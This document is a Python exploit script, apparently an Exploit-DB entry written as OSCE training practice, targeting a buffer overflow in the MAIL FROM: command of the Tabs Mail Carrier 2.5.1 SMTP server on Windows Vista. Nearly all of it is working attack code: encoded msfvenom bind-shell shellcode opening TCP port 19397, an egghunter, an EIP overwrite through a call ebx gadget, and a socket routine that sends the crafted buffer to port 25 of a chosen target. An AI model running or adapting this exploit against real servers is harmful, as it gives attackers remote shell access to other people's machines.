# Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow # Date: March 14, 2019 # Exploit Author: Joseph McDonagh # Vendor Homepage: N/A # Software Link: N/A # Version: Mail Carrier 2.5.1 # Tested on: Windows Vista Home Basic SP2 # CVE: None #!/usr/bin/python # # This script started from PWK, Chapter 6 # I am re-purposing it Tabs Mail Carrier 2.5.1 OSCE practice # During testing, I found the MAIL FROM: is also vulnerable to Buffer Overflow # Thanks to the original authors of the EHLO parameter, gave me the starting point and nudge I needed # # Usage ./tabs_mail.pwn.py 192.168.1.66 # Bind shell on TCP port 19397 # Tested on Windows Vista Home Basic SP 2 import sys import socket import time if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] sys.exit(0) ipaddr=sys.argv[1] port=25 callebx="\xb1\x32\x9c\x0f" sled="\x90" * 8 egg="T00WT00W" pay=egg #msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e x86/shikata_ga_nai -f py | sed 's/buf/pay/g' #[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload #[-] No arch selected, selecting arch: x86 from the payload #Found 1 compatible encoders #Attempting to encode payload with 1 iterations of x86/shikata_ga_nai #x86/shikata_ga_nai succeeded with size 355 (iteration=0) #x86/shikata_ga_nai chosen with final size 355 #Payload size: 355 bytes #Final size of py file: 1710 bytes pay += "\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbe\x8c" pay += "\x69\xbd\xa0\x31\x72\x17\x03\x72\x17\x83\x4e\x6d\x5f" pay += "\x55\xb2\x86\x1d\x96\x4a\x57\x42\x1e\xaf\x66\x42\x44" pay += "\xa4\xd9\x72\x0e\xe8\xd5\xf9\x42\x18\x6d\x8f\x4a\x2f" pay += "\xc6\x3a\xad\x1e\xd7\x17\x8d\x01\x5b\x6a\xc2\xe1\x62" pay += "\xa5\x17\xe0\xa3\xd8\xda\xb0\x7c\x96\x49\x24\x08\xe2" pay += "\x51\xcf\x42\xe2\xd1\x2c\x12\x05\xf3\xe3\x28\x5c\xd3" pay += "\x02\xfc\xd4\x5a\x1c\xe1\xd1\x15\x97\xd1\xae\xa7\x71" pay += "\x28\x4e\x0b\xbc\x84\xbd\x55\xf9\x23\x5e\x20\xf3\x57" pay += "\xe3\x33\xc0\x2a\x3f\xb1\xd2\x8d\xb4\x61\x3e\x2f\x18" pay += "\xf7\xb5\x23\xd5\x73\x91\x27\xe8\x50\xaa\x5c\x61\x57" pay += "\x7c\xd5\x31\x7c\x58\xbd\xe2\x1d\xf9\x1b\x44\x21\x19" pay += "\xc4\x39\x87\x52\xe9\x2e\xba\x39\x66\x82\xf7\xc1\x76" pay += "\x8c\x80\xb2\x44\x13\x3b\x5c\xe5\xdc\xe5\x9b\x0a\xf7" pay += "\x52\x33\xf5\xf8\xa2\x1a\x32\xac\xf2\x34\x93\xcd\x98" pay += "\xc4\x1c\x18\x34\xcc\xbb\xf3\x2b\x31\x7b\xa4\xeb\x99" pay += "\x14\xae\xe3\xc6\x05\xd1\x29\x6f\xad\x2c\xd2\xc4\xeb" pay += "\xb8\x34\xb0\xe3\xec\xef\x2c\xc6\xca\x27\xcb\x39\x39" pay += "\x10\x7b\x71\x2b\xa7\x84\x82\x79\x8f\x12\x09\x6e\x0b" pay += "\x03\x0e\xbb\x3b\x54\x99\x31\xaa\x17\x3b\x45\xe7\xcf" pay += "\xd8\xd4\x6c\x0f\x96\xc4\x3a\x58\xff\x3b\x33\x0c\xed" pay += "\x62\xed\x32\xec\xf3\xd6\xf6\x2b\xc0\xd9\xf7\xbe\x7c" pay += "\xfe\xe7\x06\x7c\xba\x53\xd7\x2b\x14\x0d\x91\x85\xd6" pay += "\xe7\x4b\x79\xb1\x6f\x0d\xb1\x02\xe9\x12\x9c\xf4\x15" pay += "\xa2\x49\x41\x2a\x0b\x1e\x45\x53\x71\xbe\xaa\x8e\x31" pay += "\xce\xe0\x92\x10\x47\xad\x47\x21\x0a\x4e\xb2\x66\x33" pay += "\xcd\x36\x17\xc0\xcd\x33\x12\x8c\x49\xa8\x6e\x9d\x3f" pay += "\xce\xdd\x9e\x15" egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Build the Buffer buffer="A" * 700 # 5088 to EIP buffer+=pay buffer+="B" * (5088 - (700 + len(pay))) buffer+=callebx # Overwrite EIP with Call EBX in c:\Windows\System32\expsrv.dll buffer+=sled # 5100 bytes mark buffer+="C" * 516 # This put us at the EBX register buffer+=sled # NOPS buffer+=egghunter buffer+="D" * (5900 - len(buffer)) # Padding try: print "[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" %len(buffer) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect ((ipaddr, port)) # Connect to IP & SMTP port s.recv(1024) # receive banner s.send('EHLO root@localhost \r\n') # send EHLO s.recv(1024) # receive reply s.send('MAIL FROM: ' + buffer + '\r\n') # Send the phony Mail From s.recv(1024) s.send('RCPT TO: evelyn@evelyn \r\n') s.send('QUIT\r\n') s.close() time.sleep(1) print "[-] Done!" except: print "[-] Could not connect to target" exit()